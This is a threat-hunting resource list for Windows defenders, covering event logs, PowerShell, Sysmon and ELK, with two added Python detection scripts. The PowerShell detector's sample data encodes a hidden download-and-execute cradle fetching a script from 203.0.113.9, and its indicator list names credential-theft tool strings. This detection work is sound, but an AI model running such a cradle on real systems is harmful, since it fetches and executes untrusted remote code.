Chrome Extensions: Bypassing your security - Pablo Delgado(2017)
- Hunting Chrome extensions in a Windows AD environment with Sysmon and ELK.
Credential Access
- Articles/Writeups
Papers
A Process is No One: Hunting for Token Manipulation - Jared Atkinson, Robby Winchester(2017)
- In this paper, we will outline how we view hunting through our five-step approach to perform hypothesis-driven hunting. In addition, we will walk through a case study detecting Access Token Manipulation, highlighting the actions performed at each step of the process. At the conclusion of the paper, the reader should better understand hunting, our five-step hypothesis process, and how to apply it to real-world scenarios.
- COM
- CSharp
Event Logs
- Articles/Writeups
Talks/Presentations/Videos
What Event Logs? Part 1: Attacker Tricks to Remove Event Logs - Matt Bromiley(SANS DFIR 2018)
- In part 1 of this series, SANS instructor and incident responder Matt Bromiley focuses on techniques, old and new, that attackers are using to neutralize event logs as a recording mechanism. Ranging from clearing of logs to surgical, specific event removal, in this webcast we will discuss how the attackers are doing what they're doing, and the forensic techniques we can use to detect their methods. There has been a lot of discussion lately about attackers' ability to fool the system into not writing event logs - but are our attackers truly staying hidden when they do this? Let's find out!
What Event Logs? Part 2: Lateral Movement without Event Logs - Matt Bromiley(SANS DFIR 2018)
- In part 2 of this series, SANS instructor and incident responder Matt Bromiley will discuss techniques to identify lateral movement when Windows event logs are not present. Sometimes logs roll without preservation, and sometimes attackers remove them from infected systems. Despite this, there are still multiple artifacts we can rely on to identify where our attackers came from, and where they went. In this webcast, we'll discuss the techniques and artifacts to identify this activity.
Lateral Movement
- Articles/Writeups
Tools
kethash
- A little tool for detecting suspicious privileged NTLM connections, in particular Pass-the-Hash attacks, based on Event Viewer (Security log) events.
LoLBins
- Articles/Writeups
.NET
Articles/Writeups
- Interesting DFIR traces of .NET CLR Usage Logs - menasec.net
- Detecting attacks leveraging the .NET Framework - Zac Brown, Shane Welcher(2020)
- Hunting For In-Memory .NET Attacks - Joe Desimone(2017)
Hunting for SILENTTRINITY - Wee-Jing Chung(2019)
- SILENTTRINITY (byt3bl33d3r, 2018) is a recently released post-exploitation agent powered by IronPython and C#. This blog post will delve into how it works and techniques for detection.
Tools
ClrGuard
- ClrGuard is a proof of concept project to explore instrumenting the Common Language Runtime (CLR) for security purposes. ClrGuard leverages a simple AppInit DLL (ClrHook32/64.dll) in order to load into all CLR/.NET processes. From there, it performs an in-line hook of security critical functions. Currently, the only implemented hook is on the native LoadImage() function. When events are observed, they are sent over a named pipe to a monitoring process for further introspection and mitigation decisions.
Network-Facing Services
Articles/Writeups
- [WebDAV Traffic To Malicious Sites - Didier Stevens](https://blog.didierstevens.com/2017/11/13/webdav-traffic-to-malicious-sites/)
- TL;DR: when files are retrieved remotely with the file:// URI scheme on Windows, Windows will fall back to WebDAV when an SMB connection cannot be established.
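A proxy-log hunt for the fallback the post describes, as an added example that is not Didier Stevens' code: when the SMB attempt to a file:// UNC path fails (outbound TCP/445 is usually blocked at the perimeter), the WebClient service retries over HTTP with its own user agent, Microsoft-WebDAV-MiniRedir, so that user agent talking to a non-internal host is the thing to alert on. The tab-separated log layout, the internal DNS suffix and the log lines are assumptions constructed for this example.

```python
"""Find Windows WebDAV Mini-Redirector traffic leaving the network in proxy logs.

Added example, not the post's code. The log format (tab-separated: timestamp,
client_ip, method, url, status, user_agent), INTERNAL_SUFFIXES and SAMPLE_LOG
are assumptions/constructed data.
"""
import ipaddress
from urllib.parse import urlsplit

INTERNAL_SUFFIXES = (".corp.example",)          # assumed internal DNS suffix
WEBDAV_UA_PREFIX = "Microsoft-WebDAV-MiniRedir/"
# Explicit RFC 1918 + loopback ranges; ipaddress.is_private also treats the
# documentation ranges (203.0.113.0/24 etc.) as private, which we do not want.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

SAMPLE_LOG = "\n".join("\t".join(fields) for fields in [   # constructed log lines
    ("2017-11-13T09:01:02Z", "10.0.7.23", "GET", "http://intranet.corp.example/index.html", "200", "Mozilla/5.0"),
    ("2017-11-13T09:01:05Z", "10.0.7.23", "OPTIONS", "http://files.corp.example/", "200", "Microsoft-WebDAV-MiniRedir/10.0.17134"),
    ("2017-11-13T09:02:11Z", "10.0.7.23", "OPTIONS", "http://203.0.113.9/", "200", "Microsoft-WebDAV-MiniRedir/10.0.17134"),
    ("2017-11-13T09:02:11Z", "10.0.7.23", "PROPFIND", "http://203.0.113.9/share", "207", "Microsoft-WebDAV-MiniRedir/10.0.17134"),
    ("2017-11-13T09:03:40Z", "10.0.7.24", "GET", "http://cdn.example.net/app.js", "200", "Mozilla/5.0"),
])


def parse(line):
    """Split one assumed-format proxy log line into a record."""
    ts, client, method, url, status, ua = line.rstrip("\n").split("\t", 5)
    return {"ts": ts, "client": client, "method": method, "url": url, "status": status, "ua": ua}


def is_internal(host):
    """RFC 1918/loopback addresses and names under the internal suffix count as internal."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:                          # not an IP literal: check the DNS suffix
        name = host.lower()
        return any(name.endswith(s) for s in INTERNAL_SUFFIXES)
    return any(ip in net for net in PRIVATE_NETS)


def find_external_webdav(log_text):
    """One alert per (client, host) seen with the MiniRedir user agent to a non-internal host."""
    alerts = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse(line)
        if not rec["ua"].startswith(WEBDAV_UA_PREFIX):
            continue
        host = urlsplit(rec["url"]).hostname or ""
        if is_internal(host):
            continue                            # SharePoint/file servers: expected WebDAV
        key = (rec["client"], host)
        alert = alerts.setdefault(key, {"client": rec["client"], "host": host,
                                        "first_seen": rec["ts"], "methods": set()})
        alert["methods"].add(rec["method"])
    return list(alerts.values())


if __name__ == "__main__":
    for alert in find_external_webdav(SAMPLE_LOG):
        print(alert)
```

The OPTIONS/PROPFIND pair is the Mini-Redirector's discovery sequence, so an alert whose methods set contains them is a host that actually tried to mount the remote share, not just a stray GET; on the firewall side the same incident shows up as a blocked outbound 445 from the client a second or two before the HTTP request, which is a useful corroborating query.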
Persistence
- Articles/Writeups
Talks/Presentations/Videos
Obtaining and Detecting Domain Persistence - Grant Bugher(DEF CON 23)
- When a Windows domain is compromised, an attacker has several options to create backdoors, obscure his tracks, and make his access difficult to detect and remove. In this talk, I discuss ways that an attacker who has obtained domain administrator privileges can extend, persist, and maintain control, as well as how a forensic examiner or incident responder could detect these activities and root out an attacker.
Tools
Windows-Hunting
- (Has info on persistence) The purpose of this repository is to aid Windows threat hunters in looking for some common artifacts during their day-to-day operations.
- Privilege Escalation
Processes
- Articles/Writeups
Talks/Presentations/Videos
Tricking modern endpoint security products - Michel Coene(SANS2020)
- The current endpoint monitoring capabilities we have available to us are unprecedented. Many tools and our self/community-built detection rules rely on parent-child relationships and command-line arguments to detect malicious activity taking place on a system. There are, however, ways the adversaries can get around these detections. During this presentation, we'll talk about the following techniques and how we can detect them: parent-child relationship spoofing; command-line argument spoofing; process injection; process hollowing.
Tools
PE-Sieve
- [..] a tool that helps to detect malware running on the system, as well as to collect the potentially malicious material for further analysis. Recognizes and dumps a variety of implants within the scanned process: replaced/injected PEs, shellcodes, hooks, and other in-memory patches. Detects inline hooks, Process Hollowing, Process Doppelgänging, Reflective DLL Injection, etc.
hollows_hunter
- Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).
Get-InjectedThread.ps1
- Looks for threads that were created as a result of code injection.
PowerShell
Articles/Writeups
- Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science
Attack and Defense Around PowerShell Event Logging - Mina Hao(2019)
- Blogpost covering the logging mechanisms of each major PowerShell version up to v6, the security features of each, and the attack means, ideas and techniques used against each version's event logging.
- Greater Visibility Through PowerShell Logging - Matthew Dunwoody(2016)
DeepBlueCLI
- A PowerShell module for threat hunting via Windows event logs.
Securing PowerShell in the Enterprise - Australian Cyber Security Centre(2020)
- This document describes a maturity framework for PowerShell in a way that balances the security and business requirements of organisations. This maturity framework will enable organisations to take incremental steps towards securing PowerShell across their environment. Appendix E lists strings for log analysis.
- From PowerShell to P0W3rH3LL – Auditing PowerShell - ingmar.koecher(2018)
- Windows Log Hunting with PowerShell
- Uncovering Indicators of Compromise (IoC) Using PowerShell, Event Logs, and a Traditional Monitoring Tool
- Detecting Offensive PowerShell Attack Tools - adsecurity.org
- Detecting Modern PowerShell Attacks with SIEM - Justin Henderson
PowerShell Security: Is it Enough? - Timothy Hoffman
- "This paper aims to analyze a PowerShell-based attack campaign and evaluate each security feature in its ability to effectively prevent or detect the attacks individually and collectively. These results will in no way be all inclusive, as technology is ever-changing, and new methods are emerging to counteract current security measures."
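The string-hunting the logging write-ups above recommend, as an added example that is not taken from any of them: it pulls the base64/UTF-16LE payload out of an -EncodedCommand argument found in a process-creation command line (4688 or Sysmon EID 1), then scores the visible command line and the decoded payload together with script block text (PowerShell Operational 4104) against a weighted indicator list. The indicator list, the weights and the sample records are assumptions; the list is a starting set written for this example, not a reproduction of the ACSC appendix.

```python
"""Decode -EncodedCommand payloads and score PowerShell activity for suspicious strings.

Added example, not code from the posts above. Records are dicts with
'source' ('4688' command line or '4104' script block) and 'text'.
STRINGS and SAMPLES are assumptions/constructed data.
"""
import base64
import re

# (regex, weight); matched case-insensitively against the text plus any decoded payload.
STRINGS = [
    (r"-e(?:nc(?:odedcommand)?)?\s", 3),              # -e / -enc / -EncodedCommand
    (r"frombase64string", 3),
    (r"\biex\b|invoke-expression", 2),
    (r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", 2),
    (r"-nop\b|-noprofile", 1),
    (r"-w(?:indowstyle)?\s+hidden", 2),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", 2),
    (r"invoke-mimikatz|sekurlsa|reflectivepeinjection|invoke-shellcode", 5),
    (r"\[char\]\s*\d+|\x60|\^\s*\w", 1),               # char-code, backtick, caret obfuscation
]

# -e, -ec, -en, -enc ... -EncodedCommand, then a base64 blob. Covers the common
# abbreviations only, not every prefix PowerShell's parameter binder accepts.
_ENC_RE = re.compile(r"[-/]e(?:n(?:c(?:odedcommand)?)?|c)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def _b64_utf16(ps):
    """Encode a PowerShell string the way -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


SAMPLES = [  # constructed records
    {"source": "4688", "text": "powershell.exe -nop -w hidden -enc "
        + _b64_utf16("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')")},
    {"source": "4104", "text": r"Get-ChildItem C:\Users -Recurse | Measure-Object"},
    {"source": "4104", "text": "$s = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b)); Invoke-Expression $s"},
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)                 # tolerate stripped padding
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):       # binascii.Error is a ValueError
        return None


def score(text):
    """Sum the weights of every indicator present; also return which ones matched."""
    total, matched = 0, []
    for pattern, weight in STRINGS:
        if re.search(pattern, text, re.IGNORECASE):
            total += weight
            matched.append(pattern)
    return total, matched


def analyze(record):
    """Decode any encoded command, then score the visible and decoded layers together."""
    text = record["text"]
    decoded = decode_encoded_command(text)
    layers = text if decoded is None else text + "\n" + decoded
    total, matched = score(layers)
    return {"source": record["source"], "score": total, "decoded": decoded, "matched": matched}


if __name__ == "__main__":
    for rec in SAMPLES:
        result = analyze(rec)
        print(result["source"], result["score"], result["decoded"] or "(no encoded command)")
```

Scoring the decoded layer is what makes the encoded-command case useful: the visible 4688 line only shows flags, while the payload carries the download cradle. With script block logging enabled the same cradle also appears in 4104, already decoded, so the two sources corroborate each other and an attacker has to defeat both to stay quiet.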
Talks/Presentations/Videos
Hunting for PowerShell Abuse - Teymur Kheirkhabarov(Offzone2019)
- Slides
- In the presentation the author demonstrates approaches for detecting PowerShell abuse based on different event sources, such as native Windows logging capabilities as well as additional tools like Sysmon or EDR solutions. How to collect traces of PowerShell use, how to filter out false positives, and how to find evidence of malicious use in the volume of events that remains after filtering: all these questions will be answered in the talk for present and future threat hunters.
- Tracking Activity and Abuse of PowerShell - Carlos Perez(PSConEU 2019)
Investigating PowerShell Attacks - Ryan Kazanciyan, Matt Hastings(BHUSA2014)
- Paper
- This presentation will focus on common attack patterns performed through PowerShell - such as lateral movement, remote command execution, reconnaissance, file transfer, and establishing persistence - and the sources of evidence they leave behind. We'll demonstrate how to collect and interpret these forensic artifacts, both on individual hosts and at scale across the enterprise. Throughout the presentation, we'll include examples from real-world incidents and recommendations on how to limit exposure to these attacks.
Tooling
Kansa
- A modular incident response framework in PowerShell. It's been tested in PSv2 / .NET 2 and later and works mostly without issue. It uses PowerShell Remoting to run user-contributed modules across hosts in an enterprise to collect data for use during incident response, breach hunts, or for building an environmental baseline.
ShimCache
- Articles/Writeups
Services
Services: Windows 10 Services(ss64)
- A list of the default services in Windows 10 (build 1903).
Sysmon
101
- Sysinternals Sysmon suspicious activity guide - blogs.technet
SysmonCommunityGuide
- TrustedSec Sysinternals Sysmon Community Guide
sysmon-config (SwiftOnSecurity)
- Sysmon configuration file template with default high-quality event tracing
Articles/Writeups
- SysInternals: SysMon Unleashed
- Threat Hunting: Fine Tuning Sysmon & Logstash to find Malware Callbacks C&C - Pablo Delgado
- Tales of a Blue Teamer: Detecting Powershell Empire shenanigans with Sysinternals - Spartan2194(2019)
Visualise Sysmon Logs and Detect Suspicious Device Behaviour -SysmonSearch-
- JPCERT/CC has developed and released a system, "SysmonSearch", which consolidates Sysmon logs to perform faster and more accurate log analysis. We are happy to introduce the details in this article.
Investigate Suspicious Account Behaviour Using SysmonSearch
- In a past article in September 2018, we introduced the Sysmon log analysis tool "SysmonSearch" and its functions. Today, we will demonstrate how this tool can be used for incident investigation by showing some examples.
Talks & Presentations
Implementing Sysmon and Applocker - BHIS
- In almost every BHIS webcast we talk about how important application whitelisting and Sysmon are to a healthy security infrastructure. And yet, we have not done a single webcast on these two topics. Let's fix that. In this webcast we cover how to implement Sysmon and AppLocker. We cover overall strategies for implementation and how to deploy them via Group Policy. We walk through a basic sample of malware and show how both of these technologies react to it. Finally, we cover a couple of different "bypass" techniques for each. Everything in security has weaknesses, and these two technologies are no exception.
Endpoint Detection Super Powers on the cheap, with Sysmon - Olaf Hartong(Derbycon2019)
- Based on my experience as a blue and purple teamer, I wanted to create a workflow toolkit for anyone with access to Splunk to get started with a set of tools that enables them to hit the ground running on a tight budget without compromising on quality. I will explain the pain of lacking visibility in a common enterprise environment. I will present my hunting app, which contains over 150 searches and over 15 dashboards. Knowledge is power; the workflow has been intentionally built on generic searches to cover all attack variations, to be able to uncover most potentially malicious behaviour. The dashboards contain overviews and threat indicators and facilitate consecutive drill-down workflows to help the analyst determine whether this is a threat or not and allow them to whitelist.
WMI
- Articles/Writeups
- Talks & Presentations
Tools
BLUESPAWN
- BLUESPAWN is an active defense and endpoint detection and response tool, which means it can be used by defenders to quickly detect, identify, and eliminate malicious activity and malware across a network.
CimSweep
- CimSweep is a suite of CIM/WMI-based tools that enable the ability to perform incident response and hunting operations remotely across all versions of Windows. CimSweep may also be used to engage in offensive reconnaissance without the need to drop any payload to disk.
General
AWS
- Articles/Writeups
Talks & Presentations
Actionable threat hunting in AWS (SEC339) - Chris Farris, Suman Koduri(AWS re:Invent 2019)
- Learn how WarnerMedia leveraged Amazon GuardDuty, AWS CloudTrail, and its own serverless inventory tool (Antiope) to root out cloud vulnerabilities, insecure behavior, and potential account compromise activities across a large number of accounts. We cover how WarnerMedia centralizes and automates its security tooling, offer detailed Splunk queries for GuardDuty and CloudTrail, and discuss how Antiope is used for vulnerability hunting. We cover the scaling issues incurred during a large enterprise merger. Leave this session with a strategy and an actionable set of detections for finding potential data breaches and account compromises.
- Blogpost
Azure
GCP
Tools
Data Sets
Mordor
- The Mordor project provides pre-recorded security events generated by simulated adversarial techniques in the form of JavaScript Object Notation (JSON) files for easy consumption. The pre-recorded data is categorized by platforms, adversary groups, tactics and techniques defined by the MITRE ATT&CK Framework. The pre-recorded data represents not only specific known malicious events but additional context/events that occur around it. This is done on purpose so that you can test creative correlations across diverse data sources, enhancing your detection strategy and potentially reducing the number of false positives in your own environment.
Threat Analysis
Tools
Danger-Zone
- Correlate data between domains, IPs and email addresses, present it as a graph and store everything in Elasticsearch and JSON files.
Data Storage & Analysis Stacks
- 101
- Setting up a lab
Elastic Search
- 101
- Reference
- Articles/Writeups
Tools
ElastAlert
- ElastAlert is a simple framework for alerting on anomalies, spikes, or other patterns of interest from data in Elasticsearch.
dejavu
- The Missing Web UI for Elasticsearch: Import, browse and edit data with rich filters and query views, create search UIs visually.
Kibana
101
Kibana
- Kibana is an open source (Apache Licensed), browser-based analytics and search dashboard for Elasticsearch. Kibana is a snap to set up and start using. Kibana strives to be easy to get started with, while also being flexible and powerful, just like Elasticsearch.
- Introduction to Kibana
- Reference
- Articles/Writeups
LogStash
LogStash
- Logstash is a tool for managing events and logs. You can use it to collect logs, parse them, and store them for later use (like, for searching). If you store them in Elasticsearch, you can view and analyze them with Kibana. It is fully free and fully open source. The license is Apache 2.0, meaning you are pretty much free to use it however you want in whatever way.
- Getting Started With Logstash
- Logstash Documentation
- logstash anonymize: Anonymize fields by replacing values with a consistent hash.
Setting up a lab
No More Secrets: Logging Made Easy Through Graylog - VDA Labs
- Part 1: Installation, securing, and optimizing the setup part 1
- Part 2: Installation, securing, and optimizing the setup part 2
- Part 3: Domain Controller/DHCP log collection and alerts
- Part 4: File/print server log collection and alerts
- Part 5: Exchange server log collection
- Part 6: IIS log collection
- Part 7: Firewall log collection
Articles/Writeups
- Hunting Red Team Empire C2 Infrastructure
- [Hunting in Memory](https://www.endgame.com/blog/technical-blog/hunting-memory)
- [Taking Hunting to the Next Level Hunting in Memory - Jared Atkinson 2017](https://www.youtube.com/watch?v=3RUMShnJq_I)
Talks & Presentations
- Designed to be installed on a fresh install of Raspbian on a Raspberry Pi, combining Respounder (Responder detection) and Artillery (port and service spoofing) for network deception, this tool allows you to detect an attacker on the network quickly by weeding out general noisy alerts, leaving only those that matter.